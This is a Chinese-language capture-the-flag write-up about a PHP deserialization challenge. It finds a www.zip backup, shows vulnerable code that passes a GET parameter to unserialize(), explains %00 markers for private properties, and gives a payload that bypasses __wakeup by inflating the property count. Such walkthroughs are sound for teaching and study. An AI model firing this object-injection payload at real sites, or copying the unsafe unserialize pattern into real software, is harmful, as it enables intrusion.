题目给出提示:
因为每次猫猫都在我键盘上乱跳,所以我有一个良好的备份网站的习惯不愧是我!!!
尝试index.php.bak 没有发现
扫描了一下目录,有反爬机制全是429
不过还是扫出来了www.zip
有个class.php,看来是反序列化了
<?php
include 'flag.php';
error_reporting(0);
class Name{
private $username = 'nonono';
private $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
function __wakeup(){
$this->username = 'guest';
}
function __destruct(){
if ($this->password != 100) {
echo "</br>NO!!!hacker!!!</br>";
echo "You name is: ";
echo $this->username;echo "</br>";
echo "You password is: ";
echo $this->password;echo "</br>";
die();
}
if ($this->username === 'admin') {
global $flag;
echo $flag;
}else{
echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
die();
}
}
}
?>
在index.php中可以接收参数
<?php
include 'class.php';
$select = $_GET['select'];
$res=unserialize(@$select);
?>
这题思路很简单,绕过__wakeup(),使username="admin",password="100".
知识盲区
这里有个知识点,php的三个类属性,public、private、protected
在序列化的时候
public会正常输出变量值,属性名 例如 username
private会加入类名和%00,%00类名%00属性名 例如 %00Name%00username
protected %00*%00属性名 例如 %00*%00username
%00在进行编码后会变为空字符,所以传入值的时候直接使用字符型会导致%00被解析为空字符,从而无法区分public还是private.
payload
<?php
class Name{
private $username = 'admin';
private $password = '100';
}
echo serialize(new Name());
\\O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}
通过修改属性数量绕过__wakeup,详细请看 php反序列化绕过__wakeup,即将2变为3
O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}
手动添加%00,使属性名满足private属性序列化规则,%00Name%00username
O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}
获取flag